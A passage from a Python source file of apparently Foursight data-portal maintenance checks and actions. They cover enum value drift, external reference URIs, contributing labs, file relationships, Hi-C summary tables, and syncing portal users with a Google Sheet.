if an_item.get(part2):
new_vals.append(an_item[part2])
else:
if val1.get(part2):
new_vals.append(val1[part2])
else:
val1 = item.get(field_name)
if val1:
if isinstance(val1, list):
new_vals.extend(val1)
else:
new_vals.append(val1)
# are these linkTo items
if new_vals:
if isinstance(new_vals[0], dict):
new_vals = [i['display_title'] for i in new_vals]
new_vals = [i for i in new_vals if i not in options]
return new_vals
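# Illustrative call (hypothetical field/item): extract_value('tags.title', {'tags': [{'title': 'new'}, {'title': 'val1'}]}, ['val1'])
# walks the sub-embedded list and returns ['new'], dropping values already listed in the suggested/ignored options.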
outputs = []
# Get Schemas
schemas = ff_utils.get_metadata('/profiles/', key=connection.ff_keys)
sug_en_cases = {}
for an_item_type in schemas:
properties = schemas[an_item_type]['properties']
sug_en_fields = find_suggested_enum(properties)
if sug_en_fields:
sug_en_cases[an_item_type] = sug_en_fields
for item_type in sug_en_cases:
for i in sug_en_cases[item_type]:
extension = ""
field_name = i[0]
field_option = i[1]
# create queries - we might need multiple since there is a url length limit
# Experimental - limit seems to be between 5260-5340
# all queries are appended by filter for No value
character_limit = 2000
extensions = []
extension = ''
for case in field_option:
if len(extension) < character_limit:
extension += '&' + field_name + '!=' + case
else:
# time to finalize, add no value
extension += '&' + field_name + '!=' + 'No value'
extensions.append(extension)
# reset extension
extension = '&' + field_name + '!=' + case
# add the leftover extension - there should always be one
if extension:
extension += '&' + field_name + '!=' + 'No value'
extensions.append(extension)
# only return this field
f_ex = '&field=' + field_name
common_responses = []
for an_ext in extensions:
q = "/search/?type={it}{ex}{f_ex}".format(it=item_type, ex=an_ext, f_ex=f_ex)
responses = ff_utils.search_metadata(q, connection.ff_keys)
# if this is the first response, assign this as the first common response
if not common_responses:
common_responses = responses
# for subsequent responses, keep only the results in common with the previous ones (intersection)
else:
filter_ids = [i['@id'] for i in responses]
common_responses = [i for i in common_responses if i['@id'] in filter_ids]
# let's check if we depleted common_responses
if not common_responses:
break
odds = []
for response in common_responses:
odds.extend(extract_value(field_name, response, field_option))
if len(odds) > 0:
outputs.append(
{
'item_type': item_type,
'field': field_name,
'new_values': dict(Counter(odds))
})
if not outputs:
check.allow_action = False
check.brief_output = []
check.full_output = []
check.status = 'PASS'
check.summary = 'No new values for suggested enum fields'
check.description = 'No new values for suggested enum fields'
else:
b_out = []
for res in outputs:
b_out.append(res['item_type'] + ': ' + res['field'])
check.allow_action = False
check.brief_output = b_out
check.full_output = outputs
check.status = 'WARN'
check.summary = 'Suggested enum fields have new values'
check.description = 'Suggested enum fields have new values'
return check
@action_function()
def add_suggested_enum_values(connection, **kwargs):
"""No action is added yet, this is a placeholder for
automated pr that adds the new values."""
# TODO: for linkTo items, the current values are @ids, and might need a change
action = ActionResult(connection, 'add_suggested_enum_values')
action_logs = {}
# check_result = action.get_associated_check_result(kwargs)
action.status = 'DONE'
action.output = action_logs
return action
@check_function(days_back=30)
def check_external_references_uri(connection, **kwargs):
'''
Check if external_references.uri is missing while external_references.ref
is present.
'''
check = CheckResult(connection, 'check_external_references_uri')
days_back = kwargs.get('days_back')
from_date_query, from_text = wrangler_utils.last_modified_from(days_back)
search = ('search/?type=Item&external_references.ref%21=No+value' +
'&field=external_references' + from_date_query)
result = ff_utils.search_metadata(search, key=connection.ff_keys, is_generator=True)
items = []
for res in result:
bad_refs = [er.get('ref') for er in res.get('external_references', []) if not er.get('uri')]
if bad_refs:
items.append({'@id': res['@id'], 'refs': bad_refs})
names = [ref.split(':')[0] for item in items for ref in item['refs']]
name_counts = [{na: names.count(na)} for na in set(names)]
if items:
check.status = 'WARN'
check.summary = 'external_references.uri is missing'
check.description = '%s items %sare missing uri' % (len(items), from_text)
else:
check.status = 'PASS'
check.summary = 'All external_references uri are present'
check.description = 'All dbxrefs %sare formatted properly' % from_text
check.brief_output = name_counts
check.full_output = items
return check
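# An illustrative flagged item (hypothetical ids/refs) would look like
#   {'@id': '/biosamples/4DNBSEXAMPLE/', 'refs': ['GEO:GSM123456']}
# i.e. the ref is present but no uri was filled in; brief_output then counts refs per prefix, e.g. [{'GEO': 1}].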
@check_function(days_back=30)
def check_opf_lab_different_than_experiment(connection, **kwargs):
'''
Check if other processed files have a lab (generating lab) that is different
from the lab that generated the experiment. In this case, the
experimental lab needs to be added to the opf as a contributing lab.
'''
check = CheckResult(connection, 'check_opf_lab_different_than_experiment')
check.action = 'add_contributing_lab_opf'
# check only recently modified files, to reduce the number of items
days_back = kwargs.get('days_back')
from_date_query, from_text = wrangler_utils.last_modified_from(days_back)
search = ('search/?type=FileProcessed' +
'&track_and_facet_info.experiment_bucket%21=No+value' +
'&track_and_facet_info.experiment_bucket%21=processed+file' +
'&field=experiment_sets&field=experiments' +
'&field=lab&field=contributing_labs' + from_date_query)
other_processed_files = ff_utils.search_metadata(search, key=connection.ff_keys)
output_opfs = {'to_patch': [], 'problematic': []}
exp_set_uuids_to_check = [] # Exp or ExpSet uuid list
for opf in other_processed_files:
if opf.get('experiments'):
exp_or_sets = opf['experiments']
elif opf.get('experiment_sets'):
exp_or_sets = opf['experiment_sets']
else: # this should not happen
output_opfs['problematic'].append({'@id': opf['@id']})
continue
opf['exp_set_uuids'] = [exp_or_set['uuid'] for exp_or_set in exp_or_sets]
exp_set_uuids_to_check.extend([uuid for uuid in opf['exp_set_uuids'] if uuid not in exp_set_uuids_to_check])
# get lab of Exp/ExpSet
result_exp_set = ff_utils.get_es_metadata(exp_set_uuids_to_check, sources=['uuid', 'properties.lab'], key=connection.ff_keys)
es_uuid_2_lab = {} # map Exp/Set uuid to Exp/Set lab
for es in result_exp_set:
es_uuid_2_lab[es['uuid']] = es['properties']['lab']
# evaluate contributing lab
for opf in other_processed_files:
if opf['@id'] in [opf_probl['@id'] for opf_probl in output_opfs['problematic']]:
# skip problematic files
continue
opf_exp_set_labs = list(set([es_uuid_2_lab[exp_set] for exp_set in opf['exp_set_uuids']]))
contr_labs = [lab['uuid'] for lab in opf.get('contributing_labs', [])]
# add labs of Exp/Set that are not lab or contr_labs of opf
labs_to_add = [es_lab for es_lab in opf_exp_set_labs if es_lab != opf['lab']['uuid'] and es_lab not in contr_labs]
if labs_to_add:
contr_labs.extend(labs_to_add)
output_opfs['to_patch'].append({
'@id': opf['@id'],
'contributing_labs': contr_labs,
'lab': opf['lab']['display_title']})
if output_opfs['to_patch'] or output_opfs['problematic']:
check.status = 'WARN'
check.summary = 'Supplementary files need attention'
check.description = '%s files %sneed patching' % (len(output_opfs['to_patch']), from_text)
if output_opfs['problematic']:
check.description += ' and %s files have problems with experiments or sets' % len(output_opfs['problematic'])
if output_opfs['to_patch']:
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'All supplementary files have correct contributing labs'
check.description = 'All files %sare good' % from_text
check.brief_output = {'to_patch': len(output_opfs['to_patch']), 'problematic': len(output_opfs['problematic'])}
check.full_output = output_opfs
return check
@action_function()
def add_contributing_lab_opf(connection, **kwargs):
'''
Add contributing lab (the experimental lab that owns the experiment/set) to
the other processed files (supplementary) analyzed by a different lab.
'''
action = ActionResult(connection, 'add_contributing_lab_opf')
check_res = action.get_associated_check_result(kwargs)
files_to_patch = check_res['full_output']['to_patch']
action_logs = {'patch_success': [], 'patch_failure': []}
for a_file in files_to_patch:
patch_body = {'contributing_labs': a_file['contributing_labs']}
try:
ff_utils.patch_metadata(patch_body, a_file['@id'], key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({a_file['@id']: str(e)})
else:
action_logs['patch_success'].append(a_file['@id'])
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def grouped_with_file_relation_consistency(connection, **kwargs):
''' Check if "grouped with" file relationships are reciprocal and complete.
While other types of file relationships are automatically updated on
the related file, "grouped with" ones need to be explicitly (manually)
patched on the related file. This check ensures that there are no
related files that lack the reciprocal relationship, or that lack some
of the group relationships (for groups larger than 2 files).
'''
check = CheckResult(connection, 'grouped_with_file_relation_consistency')
check.action = 'add_grouped_with_file_relation'
search = 'search/?type=File&related_files.relationship_type=grouped+with&field=related_files'
files = ff_utils.search_metadata(search, key=connection.ff_keys, is_generator=True)
file2all = {} # map all existing relations
file2grp = {} # map "group with" existing relations
for f in files:
for rel in f['related_files']:
rel_type = rel['relationship_type']
rel_file = rel['file']['@id']
file2all.setdefault(f['@id'], []).append(
{"relationship_type": rel_type, "file": rel_file})
if rel_type == "grouped with":
file2grp.setdefault(f['@id'], []).append(rel_file)
# list groups of related items
groups = []
newgroups = [set(rel).union({file}) for file, rel in file2grp.items()]
# Check if any pair of groups in the list has a common file (intersection).
# In that case, they are parts of the same group: merge them.
# Repeat until all groups are disjoint (not intersecting).
while len(groups) != len(newgroups):
groups, newgroups = newgroups, []
for a_group in groups:
for each_group in newgroups:
if not a_group.isdisjoint(each_group):
each_group.update(a_group)
break
else:
newgroups.append(a_group)
# find missing relations
missing = {}
for a_group in newgroups:
pairs = [(a, b) for a in a_group for b in a_group if a != b]
for (a_file, related) in pairs:
if related not in file2grp.get(a_file, []):
missing.setdefault(a_file, []).append(related)
if missing:
# add existing relations to patch related_files
to_patch = {}
for f, r in missing.items():
to_patch[f] = file2all.get(f, [])
to_patch[f].extend([{"relationship_type": "grouped with", "file": rel_f} for rel_f in r])
check.brief_output = missing
check.full_output = to_patch
check.status = 'WARN'
check.summary = 'File relationships are missing'
check.description = "{} files are missing 'grouped with' relationships".format(len(missing))
check.allow_action = True
check.action_message = ("DO NOT RUN if relations need to be removed! "
"This action will attempt to patch {} items by adding the missing 'grouped with' relations".format(len(to_patch)))
else:
check.status = 'PASS'
check.summary = check.description = "All 'grouped with' file relationships are consistent"
return check
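# Illustrative example (hypothetical file @ids): if file A lists "grouped with" B, and B lists A and C,
# file2grp is {'A': ['B'], 'B': ['A', 'C']}; the merge loop collapses these into one group {A, B, C},
# and the missing map then asks A to also point at C, and C to point at both A and B.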
@action_function()
def add_grouped_with_file_relation(connection, **kwargs):
action = ActionResult(connection, 'add_grouped_with_file_relation')
check_res = action.get_associated_check_result(kwargs)
files_to_patch = check_res['full_output']
action_logs = {'patch_success': [], 'patch_failure': []}
for a_file, related_list in files_to_patch.items():
patch_body = {"related_files": related_list}
try:
ff_utils.patch_metadata(patch_body, a_file, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({a_file: str(e)})
else:
action_logs['patch_success'].append(a_file)
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function(days_back=1)
def check_hic_summary_tables(connection, **kwargs):
''' Check for recently modified Hi-C Experiment Sets that are released.
If any result is found, update the summary tables.
'''
check = CheckResult(connection, 'check_hic_summary_tables')
check.action = 'patch_hic_summary_tables'
query = ('search/?type=ExperimentSetReplicate&status=released' +
'&experiments_in_set.experiment_type.assay_subclass_short=Hi-C')
# search if there is any new expset
from_date_query, from_text = wrangler_utils.last_modified_from(kwargs.get('days_back'))
new_sets = ff_utils.search_metadata(query + from_date_query + '&field=accession', key=connection.ff_keys)
if len(new_sets) == 0: # no update needed
check.status = 'PASS'
check.summary = check.description = "No update needed for Hi-C summary tables"
return check
else:
check.status = 'WARN'
check.summary = 'New Hi-C datasets found'
# collect ALL metadata to patch
expsets = ff_utils.search_metadata(query, key=connection.ff_keys)
def _add_set_to_row(row, expset, dsg):
''' Add ExpSet metadata to the table row for dsg'''
row.setdefault('Data Set', {'text': dsg})
row['Data Set'].setdefault('ds_list', set()).add(expset.get('dataset_label'))
row.setdefault('Study', set()).add(expset.get('study'))
row.setdefault('Class', set()).add(expset.get('study_group'))
row.setdefault('Project', set()).add(expset['award']['project'])
row.setdefault('Lab', set()).add(expset['lab']['display_title'])
exp_type = expset['experiments_in_set'][0]['experiment_type']['display_title']
row['Replicate Sets'] = row.get('Replicate Sets', dict())
row['Replicate Sets'][exp_type] = row['Replicate Sets'].get(exp_type, 0) + 1
biosample = expset['experiments_in_set'][0]['biosample']
row.setdefault('Species', set()).add(biosample['biosource'][0].get('individual', {}).get('organism', {}).get('name', 'unknown species'))
if biosample['biosource'][0].get('cell_line'):
biosource = biosample['biosource'][0]['cell_line']['display_title']
else:
biosource = biosample['biosource_summary']
row.setdefault('Biosources', set()).add(biosource)
journal_mapping = {
'Science (New York, N.Y.)': 'Science',
'Genome biology': 'Genome Biol',
'Nature biotechnology': 'Nat Biotechnol',
'Nature genetics': 'Nat Genet',
'Nature communications': 'Nat Commun',
'Proceedings of the National Academy of Sciences of the United States of America': 'PNAS',
'The Journal of biological chemistry': 'J Biol Chem',
'The EMBO journal': 'EMBO J',
'The Journal of cell biology': 'J Cell Biol',
'Nature cell biology': 'Nat Cell Biol',
'Molecular cell': 'Mol Cell'
}
pub = expset.get('produced_in_pub')
if pub:
publication = [
{'text': pub['short_attribution'], 'link': pub['@id']},
{'text': '(' + journal_mapping.get(pub['journal'], pub['journal']) + ')', 'link': pub['url']}]
previous_pubs = [i['text'] for i in row.get('Publication', []) if row.get('Publication')]
if publication[0]['text'] not in previous_pubs:
row.setdefault('Publication', []).extend(publication)
return row
def _row_cleanup(row):
'''Summarize various fields in row'''
(row['Study'],) = row['Study']
(row['Class'],) = row['Class']
dsg_link = '&'.join(["dataset_label=" + ds for ds in row['Data Set']['ds_list']])
dsg_link = "/browse/?" + dsg_link.replace("+", "%2B").replace("/", "%2F").replace(" ", "+")
row['Data Set']['link'] = dsg_link
row['Replicate Sets'] = "<br>".join(
[str(count) + " " + exp_type for exp_type, count in row['Replicate Sets'].items()])
return row
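# e.g. (illustrative) a row whose ds_list is {'Dataset A+B'} ends up with the link
# '/browse/?dataset_label=Dataset+A%2BB' after the escaping above.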
# build the table
table = {}
problematic = {}
for a_set in expsets:
# make sure dataset and study group are present
if (a_set.get('dataset_label') is None) or (a_set.get('study_group') is None):
problematic.setdefault('missing_info', []).append(a_set['@id'])
continue
# create/update row in the table
dsg = a_set.get('dataset_group', a_set['dataset_label'])
table[dsg] = _add_set_to_row(table.get(dsg, {}), a_set, dsg)
# consolidate the table
for dsg, row in table.items():
if (len(row['Study']) == 1) and (len(row['Class']) == 1):
table[dsg] = _row_cleanup(row)
else:
problematic.setdefault('multiple_info', []).append(dsg)
table.pop(dsg)
# split table into studygroup-specific output tables
output = {}
study_groups = list({row['Class'] for row in table.values()})
for st_grp in study_groups:
table_stg = {dsg: row for dsg, row in table.items() if row['Class'] == st_grp}
keys = ['Data Set', 'Project', 'Replicate Sets', 'Species', 'Biosources', 'Publication', 'Study', 'Lab']
if st_grp == "Single Time Point and Condition":
keys.remove('Study')
# make markdown table
name = "data-highlights.hic." + st_grp.lower().replace(" ", "-") + ".md"
default_col_widths = "[-1,100,-1,100,-1,-1,-1,-1]"
if "Study" not in keys:
default_col_widths = "[-1,100,-1,120,250,-1,170]"
output[st_grp] = {
'alias': "4dn-dcic-lab:" + name,
'body': wrangler_utils.md_table_maker(table_stg, keys, name, default_col_widths)}
check.description = "Hi-C summary tables need to be updated."
if problematic:
check.full_output = problematic
if problematic.get('missing_info'):
check.description += ' Dataset or study group are missing.'
if problematic.get('multiple_info'):
check.description += ' Multiple study or study groups found for the same dataset group.'
check.description += ' Will NOT patch until these problems are resolved. See full output for details.'
else:
check.brief_output = [s['accession'] for s in new_sets]
check.full_output = output
check.allow_action = True
check.action_message = 'Will attempt to patch {} static sections'.format(len(output))
return check
@action_function()
def patch_hic_summary_tables(connection, **kwargs):
''' Update the Hi-C summary tables
'''
action = ActionResult(connection, 'patch_hic_summary_tables')
check_res = action.get_associated_check_result(kwargs)
sections_to_patch = check_res['full_output']
action_logs = {'patch_success': [], 'patch_failure': []}
for item in sections_to_patch.values():
try:
ff_utils.patch_metadata({"body": item['body']}, item['alias'], key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({item['alias']: str(e)})
else:
action_logs['patch_success'].append(item['alias'])
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
def get_oh_google_sheet():
# GET KEY FROM S3 To Access
# TODO: encrypt the key same as foursight key and use same function to fetch it
s3 = boto3.resource('s3')
obj = s3.Object('elasticbeanstalk-fourfront-webprod-system', 'DCICjupgoogle.json')
cont = obj.get()['Body'].read().decode()
key_dict = json.loads(cont)
SCOPES = 'https://www.googleapis.com/auth/spreadsheets'
creds = ServiceAccountCredentials.from_json_keyfile_dict(key_dict, SCOPES)
gc = gspread.authorize(creds)
# Get the google sheet information
book_id = '1zPfPjm1-QT8XdYtE2CSRA83KOhHfiRWX6rRl8E1ARSw'
sheet_name = 'AllMembers'
book = gc.open_by_key(book_id)
worksheet = book.worksheet(sheet_name)
return worksheet
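# Illustrative usage (as done in the check below): the worksheet returned above is read with
# worksheet.get_all_values(); the first row holds the column headers (e.g. 'DCIC UUID', 'OH Account Email')
# and the remaining rows are turned into per-user dicts via pandas in sync_users_oh_status.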
@check_function()
def sync_users_oh_status(connection, **kwargs):
"""
Check users on the database and the OH google sheet, and synchronize them
1) Pull all table values, all database users, labs and awards
2) If an entry is inactive in OH, remove the user's permissions (lab, viewing_groups, submits_for, groups) from DCIC and mark it inactive for DCIC
3) If the user exists for both OH and DCIC, check the values on the DCIC database, and update the DCIC columns if anything differs from the table.
4) If only OH information is available on the table,
4.1) skip entries with no email, and skip inactive ones
4.2) if the email already belongs to a user on the table, report a problem
4.3) if the email exists on the DCIC database, add the DCIC information
4.4) if the email is available, find the matching lab, create a new user, and add the user information to the table
4.5) if the lab cannot be found, report that a new lab needs to be created.
5) Check for users that are on the DCIC database but not on the table, and add them as new DCIC users.
If a new user needs to be created, it will first be created on the portal, and the second time
the check runs it will be added to the excel sheet (to prevent problems with un-synchronized actions)
"""
check = CheckResult(connection, 'sync_users_oh_status')
my_auth = connection.ff_keys
check.action = "sync_users_oh_start"
check.description = "Synchronize portal and OH user records"
check.brief_output = []
check.summary = ""
check.full_output = {}
check.status = 'PASS'
check.allow_action = False
def simple(string):
return string.lower().strip()
def generate_record(user, all_labs, all_grants):
"""Create excel data from the user info"""
a_record = {}
a_record['DCIC UUID'] = user['uuid']
a_record['DCIC Role'] = user.get('job_title', "")
a_record['DCIC First Name'] = user['first_name']
a_record['DCIC Last Name'] = user['last_name']
a_record['DCIC Account Email'] = user['email']
a_record['DCIC Contact Email'] = user.get('preferred_email', "")
# Role based award and labs
if a_record['DCIC Role'] == "External Scientific Adviser":
a_record['DCIC Lab'] = ''
a_record['DCIC Grant'] = 'External Science Advisor'
return a_record, []
if a_record['DCIC Role'] == "NIH Official":
a_record['DCIC Lab'] = ''
a_record['DCIC Grant'] = 'NIH PO Officers'
return a_record, []
# add lab name
# is the user is from response
user_lab = ''
try:
lab_name = user['lab']['display_title']
user_lab = [i for i in all_labs if i['display_title'] == lab_name][0]
except:
# is the user a new one (does not exist on data yet)
user_lab = [i for i in all_labs if i['@id'] == user['lab']][0]
lab_name = user_lab['display_title']
lab_converter = {'4DN DCIC, HMS': '<NAME>, HMS'}
if lab_name in lab_converter:
lab_name = lab_converter[lab_name]
a_record['DCIC Lab'] = lab_name
if lab_name == '<NAME>, HMS':
a_record['DCIC Grant'] = 'DCIC - Park (2U01CA200059-06)'
return a_record, []
# add award
user_awards = [i['uuid'] for i in user_lab['awards']]
user_awards = [i for i in all_grants if i['uuid'] in user_awards]
award_tags = []
for an_award in user_awards:
award_tag = ''
# find first 4dn grant
if an_award.get('viewing_group') in ['4DN', 'NOFIC']:
if an_award['display_title'] == 'Associate Member Award':
award_tag = 'Associate Member'
else:
tag = an_award['description'].split(':')[0]
try:
last = an_award['pi']['last_name']
except:
last = "no_PI"
award_tag = '{} - {} ({})'.format(tag, last, an_award['name'])
if award_tag == 'DCIC - DCIC (2U01CA200059-06)':
award_tag = 'DCIC - Park (2U01CA200059-06)'
if award_tag == 'DCIC - DCIC (1U01CA200059-01)':
award_tag = 'DCIC - Park (1U01CA200059-01)'
award_tags.append(award_tag)
try:
a_record['DCIC Grant'] = award_tags[0]
except:
a_record['DCIC Grant'] = 'Lab missing 4DN Award'
return a_record, award_tags
def compare_record(existing_record, user, all_labs, all_grants, new=False):
"""Check user response, and compare it to the exising record
only report the differences"""
updated_record, alt_awards = generate_record(user, all_labs, all_grants)
# if this is generated by OH records, find the referenced award
if new:
if existing_record.get('OH Grant'):
oh_grant = existing_record['OH Grant']
if oh_grant not in updated_record['DCIC Grant']:
upd_award = [i for i in alt_awards if oh_grant in i]
if upd_award:
updated_record['DCIC Grant'] = upd_award[0]
updates = {}
for a_key, a_val in updated_record.items():
if a_key == 'DCIC Grant':
if existing_record.get(a_key) in alt_awards:
continue
if existing_record.get(a_key) != a_val:
updates[a_key] = a_val
return updates
def find_lab(record, all_labs, all_grants):
lab = ''
all_lab_names = [i['display_title'] for i in all_labs]
score = 0
best = ''
log = []
# matcher = stringmatch.Levenshtein()
for disp in all_lab_names:
s = round(string_label_similarity(record['OH Lab'], disp.split(',')[0]) * 100)
if s > score:
best = disp
score = s
if score > 73:
lab = [i['@id'] for i in all_labs if i['display_title'] == best][0]
if not lab:
oh_grant = record.get('OH Grant')
if oh_grant:
grant = [i for i in all_grants if i['name'].endswith(oh_grant)]
else:
grant = []
if grant:
lab = grant[0].get('pi', {}).get('lab', {}).get('@id', '')
score = 100
log = ['Assigned via Award', oh_grant, grant[0]['name']]
return lab, score, log
def create_user_from_oh_info(a_record, all_labs, all_grants, credentials_only=False):
user_info = {}
user_info['viewing_groups'] = ["4DN"]
if not a_record.get('OH Account Email'):
return
if not credentials_only:
user_info['email'] = simple(a_record['OH Account Email'])
user_info['first_name'] = a_record['OH First Name']
user_info['last_name'] = a_record['OH Last Name']
user_info['job_title'] = a_record['OH Role']
if not user_info['job_title']:
user_info['job_title'] = 'Lab Associate'
# pre define a uuid so we can already put it on the excel
user_uuid = str(uuid.uuid4())
user_info['uuid'] = user_uuid
# predefined cases
if not a_record['OH Grant']:
if a_record['OH Role'] == "External Science Advisor" or a_record['OH Role'] == "External Program Consultant":
user_info['lab'] = '/labs/esa-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Role'] == "NIH Official":
user_info['lab'] = '/labs/nih-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Grant'] == "External Science Advisor" or a_record['OH Grant'] == "External Program Consultant":
user_info['lab'] = '/labs/esa-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Grant'] == "NIH Official":
user_info['lab'] = '/labs/nih-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Lab'] == '<NAME>':
# This would need to be reworked if members of Peter's lab are doing research
# It would need to be replaced by /labs/peter-park-lab/
user_info['lab'] = '/labs/4dn-dcic-lab/'
user_info['lab_score'] = 100
return user_info
# find lab, assign @id
user_info['lab'], lab_score, log = find_lab(a_record, all_labs, all_grants)
# Adding more information to the check to check by eye that the labs indeed correspond to OH labs
# It will be removed in the action to create the new user in the portal
user_info['lab_score'] = lab_score
user_info['OH_lab'] = a_record['OH Lab']
user_info['Log'] = log
return user_info
# get skipped users with the skip_oh_synchronization tag
# if you want to skip more users, append the tag to the user item
skip_users_meta = ff_utils.search_metadata('/search/?type=User&tags=skip_oh_synchronization', my_auth)
# skip bots, external devs and DCIC members
skip_users_uuid = [i['uuid'] for i in skip_users_meta]
skip_lab_display_title = ['<NAME>, HARVARD', 'DCIC Testing Lab', '4DN Viewing Lab']
# Collect information from data portal
all_labs = ff_utils.search_metadata('/search/?type=Lab', key=my_auth)
all_labs = [i for i in all_labs if i['display_title'] not in skip_lab_display_title]
all_grants = ff_utils.search_metadata('/search/?type=Award', key=my_auth)
all_users = ff_utils.search_metadata('/search/?status=current&status=deleted&type=User', key=my_auth)
# Get 4DN users
fdn_users_query = '/search/?type=User&viewing_groups=4DN&viewing_groups=NOFIC'
fdn_users_query += "".join(['&lab.display_title!=' + i for i in skip_lab_display_title])
fdn_users = ff_utils.search_metadata(fdn_users_query, key=my_auth)
# keep a tally of all actions that we need to perform
actions = {'delete_user': [],
'add_user': [],
'inactivate_excel': {},
'update_excel': {},
'patch_excel': {},
'add_excel': [],
'add_credentials': []
}
# keep track of all problems we encounter
problem = {'NEW OH Line for existing user': [], 'cannot find the lab': {}, 'double check lab': [], 'edge cases': [], 'audit checks': []}
# get oh google sheet
worksheet = get_oh_google_sheet()
table = worksheet.get_all_values()
# Convert table data into an ordered dictionary
df = pd.DataFrame(table[1:], columns=table[0])
user_list = df.to_dict(orient='records', into=OrderedDict)
# all dcic users in the list
all_dcic_uuids = [i['DCIC UUID'] for i in user_list if i.get('DCIC UUID')]
# Based on the excel which users should be deleted (remove credentials or inactivate)
# This will be used for some audit checks
excel_delete_users = [i['DCIC UUID'] for i in user_list if (i.get('DCIC UUID') and i['OH Active/Inactive'] == '0' and i['DCIC Active/Inactive'] != '0')]
# iterate over records and compare
for a_record in user_list:
if a_record.get('DCIC UUID'):
# skip if in skip users list
if a_record['DCIC UUID'] in skip_users_uuid:
continue
# skip if we inactivated it already
if a_record.get('DCIC Active/Inactive') == '0':
continue
# does it exist in our system with a lab
users = [i for i in fdn_users if i['uuid'] == a_record['DCIC UUID'].strip()]
if users:
user = users[0]
# is user inactivated on OH
if a_record.get('OH Active/Inactive') == '0':
# remove the user's permissions in the portal, and in the next round, inactivate it on the excel
actions['delete_user'].append(a_record['DCIC UUID'])
else:
# user exist on excel and on our database
# any new info?
updates = compare_record(a_record, user, all_labs, all_grants)
if updates.get('DCIC Grant', '') == 'Lab missing 4DN Award':
problem['edge cases'].append([a_record['DCIC UUID'], 'Lab missing 4DN Award'])
continue
if updates:
actions['update_excel'][a_record['DCIC UUID']] = updates
# we deleted the user
else:
# This record should already have been deleted in the first round; set it to inactive on the excel sheet
actions['inactivate_excel'][a_record['DCIC UUID']] = {'DCIC Active/Inactive': "0"}
# if we did not assign a uuid
else:
# did OH say inactive, then do nothing
if a_record.get('OH Active/Inactive') == '0':
continue
# does oh have an email, if not do nothing
if not a_record.get('OH Account Email'):
continue
# do we have OH email already
# we hit this point after creating new users on the portal (second time we run this check we add them to excel)
oh_mail = simple(a_record.get('OH Account Email', ""))
other_emails = simple(a_record.get('Other Emails', "")).split(',')
users_4dn = [i for i in fdn_users if (simple(i['email']) == oh_mail or i['email'] in other_emails)]
credentials_only = False # Whether create account from scratch or add credentials
if users_4dn:
# is this user already in the excel?
# oh created line for an existing user
user = users_4dn[0]
if user['uuid'] in all_dcic_uuids:
problem['NEW OH Line for existing user'].append([user['uuid'], oh_mail])
continue
updates = compare_record(a_record, user, all_labs, all_grants, new=True)
if updates.get('DCIC Grant', '') == 'Lab missing 4DN Award':
problem['edge cases'].append([updates['DCIC UUID'], 'Lab missing 4DN Award'])
continue
if updates:
updates['DCIC Active/Inactive'] = '1'
actions['patch_excel'][a_record['OH Account Email']] = updates
else:
# If the user has an account in the data portal without 4DN credentials, but it is on OH
# add the credentials
users_all = [i for i in all_users if simple(i['email']) == oh_mail]
if users_all:
# skip if it is already pending for the credentials
if users_all[0].get('pending_lab'):
continue
credentials_only = True
user_data = create_user_from_oh_info(a_record, all_labs, all_grants, credentials_only=credentials_only)
if not user_data.get('lab'):
if a_record['OH Grant']:
add_awards = [i['uuid'] for i in all_grants if a_record['OH Grant'] in i['@id']]
else:
add_awards = []
if add_awards:
add_award = add_awards[0]
else:
add_award = a_record['OH Grant']
if a_record['OH Lab'] not in problem['cannot find the lab']:
problem['cannot find the lab'][a_record['OH Lab']] = {'award': '', 'users': []}
problem['cannot find the lab'][a_record['OH Lab']]['award'] = add_award
problem['cannot find the lab'][a_record['OH Lab']]['users'].append(a_record['OH UUID'])
continue
if user_data.get('lab_score') < 80:
if credentials_only:
user_data['uuid'] = users_all[0]['uuid']
problem['double check lab'].append(user_data)
continue
if credentials_only:
user_data['uuid'] = users_all[0]['uuid']
if users_all[0]['status'] == 'deleted':
user_data['status'] = 'current'
actions['add_credentials'].append(user_data)
continue
# if user is not in the data portal create new account
actions['add_user'].append(user_data)
all_patching_uuids = [v['DCIC UUID'] for v in actions['patch_excel'].values() if v.get('DCIC UUID')]
all_edge_cases_uuids = [i[0] for i in problem['edge cases']]
    # build the full skip list
skip_list = all_dcic_uuids + all_patching_uuids + skip_users_uuid + all_edge_cases_uuids
remaining_users = [i for i in fdn_users if i['uuid'] not in skip_list]
if remaining_users:
for a_user in remaining_users:
# create empty record object
new_record, alt_awards = generate_record(a_user, all_labs, all_grants)
if new_record.get('DCIC Grant', '') == 'Lab missing 4DN Award':
print(a_user['uuid'])
problem['edge cases'].append([new_record['DCIC UUID'], 'Lab missing 4DN Award'])
continue
new_record['DCIC Active/Inactive'] = '1'
actions['add_excel'].append(new_record)
# some audit check
# check for delete users
code_delete_users = list(actions['inactivate_excel'].keys()) + actions['delete_user']
if len(excel_delete_users) < len(code_delete_users):
diff = [i for i in code_delete_users if i not in excel_delete_users]
for i in diff:
problem['audit checks'].append([i, 'info in data may not be in sync.'])
if i in actions['inactivate_excel'].keys():
del actions['inactivate_excel'][i]
if i in actions['delete_user']:
actions['delete_user'].remove(i)
# do we need action
check.summary = ""
for a_key in actions:
if actions[a_key]:
check.status = 'WARN'
check.allow_action = True
check.summary += '| {} {}'.format(str(len(actions[a_key])), a_key)
num_problems = 0
for k in problem.keys():
if problem[k]:
check.status = 'WARN'
if k != 'cannot find the lab':
num_problems += len(problem[k])
else:
for key in problem[k].keys():
num_problems += len(problem[k][key]['users'])
check.summary += '| %s problems' % (str(num_problems))
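    # (illustrative) the resulting summary looks like:
    # '| 3 add_user| 2 update_excel| 1 problems'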
check.full_output = {'actions': actions, 'problems': problem}
return check
@action_function()
def sync_users_oh_start(connection, **kwargs):
action = ActionResult(connection, 'sync_users_oh_start')
my_auth = connection.ff_keys
sync_users_oh_check_result = action.get_associated_check_result(kwargs).get('full_output', {})
